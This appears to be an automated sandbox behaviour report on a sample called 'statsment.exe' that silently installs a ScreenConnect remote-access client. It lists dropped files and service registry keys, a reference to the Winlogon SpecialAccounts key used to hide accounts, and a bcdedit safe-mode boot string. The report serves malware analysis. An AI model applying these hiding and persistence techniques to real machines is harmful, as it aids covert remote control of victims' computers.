                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID756.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID438.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID756.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID438.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1810192866.000000001B8B2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800566476.0000000002942000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800109630.0000000000EE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: statsment.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.4.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
